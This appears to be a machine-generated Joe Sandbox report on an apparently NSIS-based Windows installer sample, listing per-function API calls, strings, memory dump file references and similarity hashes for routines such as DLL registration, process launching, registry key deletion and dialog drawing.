                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00010A00,00000064,000D2B75), ref: 00403295
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                    • String ID: u+$verifying installer: %d%%
                                                                                                                                                                                                                                                                                    • API String ID: 1451636040-2773432420
                                                                                                                                                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                    • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
